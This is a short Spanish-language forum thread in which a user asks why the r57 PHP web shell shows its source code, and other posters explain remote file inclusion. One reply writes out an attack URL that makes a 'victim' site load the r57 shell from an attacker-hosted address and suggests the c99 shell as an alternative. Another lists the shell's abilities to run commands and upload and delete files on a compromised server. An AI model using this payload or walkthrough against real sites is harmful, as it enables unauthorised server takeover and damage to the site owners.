Sabeis porque cuando voy a lanzar el exploit (r57 para ser exactos) en vez de salir el exploit correctamente me sale el codigo fuente???? lo guardo con .php en teoria me tenia que salir normal...no entiendo...help!
saludoos!
Eso es porque no existe RFI en el sistema que lo estas probando, tambien puede ser que lo hagas mal supongo que lo haces asi:
www.victima.com/scripvulnerable.php?variablevulnerable=http://atacante.con/r57.txt?tambien intenta probar con la c99
r57?
al decir r57 te debes referir al "RST" que es un equipo, y no un exploit.
Para que los PHP funcionen, deben de ser ejecutados desde la consola, con el interprete de PHP.
busca info en el foro, el tema se ha tratado muchas veces.
Saludos!!
no, la r57 es un script en php que te da una shell en el sistema vulnerable a rfi, tambien tiene opciones como subir archivos al servidor,ejecutar comandos,navegar por los archivos, crear archivos, borrar archivos etc. todo esto mientras tengas permisos en el directorio o no este en safe mode on
saludos
Autor
En línea
